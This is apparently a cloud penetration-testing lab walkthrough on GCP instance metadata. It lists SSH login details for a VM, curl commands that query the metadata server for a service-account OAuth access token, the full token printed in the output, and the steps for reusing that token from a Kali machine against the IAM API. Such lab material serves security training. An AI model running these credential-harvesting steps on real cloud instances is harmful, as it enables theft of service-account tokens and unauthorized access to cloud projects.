Skip to content

Metadata in GCP Instances

Scenario

Scenario

  • ssh tester@35.209.202.2 using security

    • curl -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/security-audit@gr-prod-1.iam.gserviceaccount.com/token"
      • OR
    • curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/security-audit@gr-prod-1.iam.gserviceaccount.com/token" 
      {"access_token":"ya29.c.c0AZ4bNpZDJfrnIbz-1_W4xk0jLhDU12rwBOcUlsg1474536zrlt-k8uD71RMrAyzw1k3wu7I9PWXWc0pWmRv1etksrXSLHp-CpTwb2cb27YlP9p0prhdeGDJb_YIos60lzpNp2MPexy2nj9NEMMIhRLaAa0LXJzh8NHqjvrl7Z5I5c3X6CV
2qtSyRDO4y6lRc3WP_uRYkjml0bRQsceVKkgLzNEk99LrTYKY9J-1X9X_wpmEWbasszbFa0-ZPtmoH6XcowKUVoXImVRrQhQdjg4GEGJGl_ZHPsobJTFiKjTyXvfQA58c89LrPyIoV5jUDPhTcVC9nLktdMXBuKERLHadVBG4GaP86bw_aPg
BO5hiPw7X8M-C1a8IN_DGG-8gkb0yt3chhedpT52e1qAG411Aq-MqF9jc_rgJQoqt7fc1yMb5Vb05WQxVQUBgosw6j5F9pR9If77WVjqZxZJF1iwfUq8wWm3nycW3imcvuj0I1X5Mgx4XW1fkv75Fu_-nYnBMf5Iyippam2Fwv2wm_3hzOiS
r8cFw0OOndF3U2afSqlvrO83qMJe6clvzm0ggrIuwaIBnoVXcv4lkopJbSogeMMVSSR8k5kpjs7dBusbjkJ7c3_ds370cUea31wOqjO8XyoM0JbcpbO6q-zRfbbOdwZbg_X-k_R9hmWcpqUIqQO1odOQB5d9_OnqUVSz5e4_rVi8MsSi7Wee
I02prga3sUSz0q31edw-fIhac_8SF0Y0-4c8-a28664MXuYriwnyhtWiloRUkwU5wSBFO20bvWyIUIkUbqRq-Vllbl6X7lxy3qUj6QhJdu2Rr435jpm8g_Mi73hXr___MmOlZB3dZ9484hnleyy4bYnX7ag3jixyoa6O7-dfUyyZ-MnQdVbuiVpxsU8VqSqoyj7kzxxv9JBd0UI5_Wdrm8fU4ie9Jue9s-_7veh-eIv34vQ0v8pc1BorFkjOJtpb-uzI5aJVoBO8rz
aOWfx0c4S9sw6Z7cjpva_svmIcx","expires_in":2501,"token_type":"Bearer"}

  • Now, on KALI

    • install gcloud-cli
    • save the access_token value in token1.txt
    • curl -s -H "Authorization: Bearer $(cat token1.txt)" https://iam.googleapis.com/v1/projects/-/serviceAccounts/security-audit@gr-prod-1.iam.gserviceaccount.com 
      {
    "name": "projects/gr-prod-1/serviceAccounts/security-audit@gr-prod-1.iam.gserviceaccount.com",
    "projectId": "gr-prod-1",
    "uniqueId": "105756880541102396381",
    "email": "security-audit@gr-prod-1.iam.gserviceaccount.com",
    "displayName": "security-audit",
    "etag": "MDEwMjE5MjA=",
    "description": "Service account for security audits",
    "oauth2ClientId": "105756880541102396381"
}